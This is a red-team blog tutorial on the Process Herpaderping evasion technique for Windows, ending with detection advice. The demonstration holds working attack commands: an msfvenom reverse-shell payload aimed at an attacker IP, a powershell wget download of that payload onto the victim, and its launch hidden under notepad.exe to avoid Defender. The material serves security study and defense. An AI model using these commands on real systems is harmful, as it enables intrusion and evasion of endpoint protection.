Defense Evasion, Red Teaming

Process Herpaderping (Mitre:T1055)

Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped memory segment of a legit process before the inspection of the created process actually begins. This helps an attacker in bypassing defenses and also privilege escalation. While MITRE hasn’t associated a sub-ID to the technique, we deemed it appropriate to write the article under process injection and defense evasion methods.

  • MITRE TACTIC: Defense Evasion (TA0005) and Privilege Escalation (TA0004)
  • MITRE Technique ID: Process Injection (T1055)

Table of Content

  • Background
  • Process Herpaderping
  • Demonstration
  • Detection
  • Conclusion

Background

Security products use a Windows callback PsSetCreateProcessNotifyRoutineEx to take action when they map a new process in memory and determine whether to allow the process to execute (if it is safe or not).

However, the system only initiates the actual AV inspection when the first thread of the respective process starts and not when it creates the process object.

This creates a window of opportunity for an attacker to create and map a process, then change the file’s content and thereafter create initial thread.

Process Herpaderping

Herpaderping is an English slang that describes a person who often becomes the target of ridicule due to their obliviousness. Johnny Shaw developed a technique called Process Herpaderping that modifies the contents of a file after mapping it in memory but before initiating the first thread to evade anti-virus/defense mechanisms. The AV cannot determine whether to continue or stop execution since the file behind the process has now changed. The original write-up, which is very clearly written, can be found here.

Steps followed are:

  • Create a target file (benign file like cmd.exe) and keep the file handle open.
  • Map the file as an image section
    • NtCreateSection with SEC_IMAGE flag set
  • Create the process object using the section handle
    • NtCreateProcessEx
  • Copy our payload and then using the previously open file handle, obscure the payload on disk.
  • Create the initial thread in the process
    • NtCreateThreadEx

At this point, the kernel will trigger the process creation callback (PsSetCreateProcessNotifyRoutineEx), and the contents on disk will not match what was mapped. Inspection of the file at this point will result in incorrect attribution.

  • Close the handle so that execution can begin properly
    • IRP_MJ_CLEANUP

Since contents of what is being executed are hidden, inspection at this point will result in incorrect attribution.

Demonstration

The official source code can be downloaded from here. All the submodules have to be included as well so follow the following procedure to effectively download the code using git.

git clone https://github.com/jxy-s/herpaderping.git
cd .\herpaderping
git submodule update --init --recursive

It can now be compiled for release using Visual Studio (I used VS 2022). I forked the repo and uploaded compiled binary for your ease of access here. It can now be run using cmd to check if its working.

Now, our payload can be executed using a simple command like this:

ProcessHerpaderping.exe payload_file target_file

We can use the third option as well but not right now. Let’s create a payload first.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.89 LPORT=1234 -f exe > payload.exe

Now we can transfer the executable and payload to our victim.

powershell wget 192.168.0.89/payload.exe -O payload.exe

Once we have transferred the payload successfully, we can run the process Herpaderping executable to run our payload hidden under some other legit executable, like notepad.exe.

ProcessHerpaderping.exe payload.exe notepad.exe

As you can see, we now must have received a reverse shell on port 1234 (as our payload suggested). This indicates a successfully herpaderp of our payload under notepad.exe

Also, in the victim system, one can re-affirm that defender is activated and has not detected our payload as malicious when it is run!

Upon inspecting this attack in process explorer on the victim system, you should get suspicious if you see suspicious child processes spawning out of legit executables. Here, cmd.exe is spawning out of notepad.exe which doesn’t allow the running of executables indicating a process injection attack!

Detection

  • AV can update its signatures to detect known functions like IRP_MJ_CLEANUP or NtCreateProcessEx and then further conduct behaviour analysis to block process injection during runtime.
  • Use PsSetCreateThreadNotifyRoutineEx instead of PsSetCreateProcessNotifyRoutineEx as the former calls back at the time of thread insertion as opposed to when the thread begins executing.
  • Sysinternal’s suite Sysmon can detect process tampering. Download here.

Conclusion

The article discusses a defense evasion technique called Process Herpaderping, which obscures the true intentions of a process by modifying the content on disk after mapping the image but before it starts executing. This confuses security products like Defender and returns incorrect attribution; yet, the payload executes nevertheless. A short demonstration also showcases it as a PoC. Hope you liked the article. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here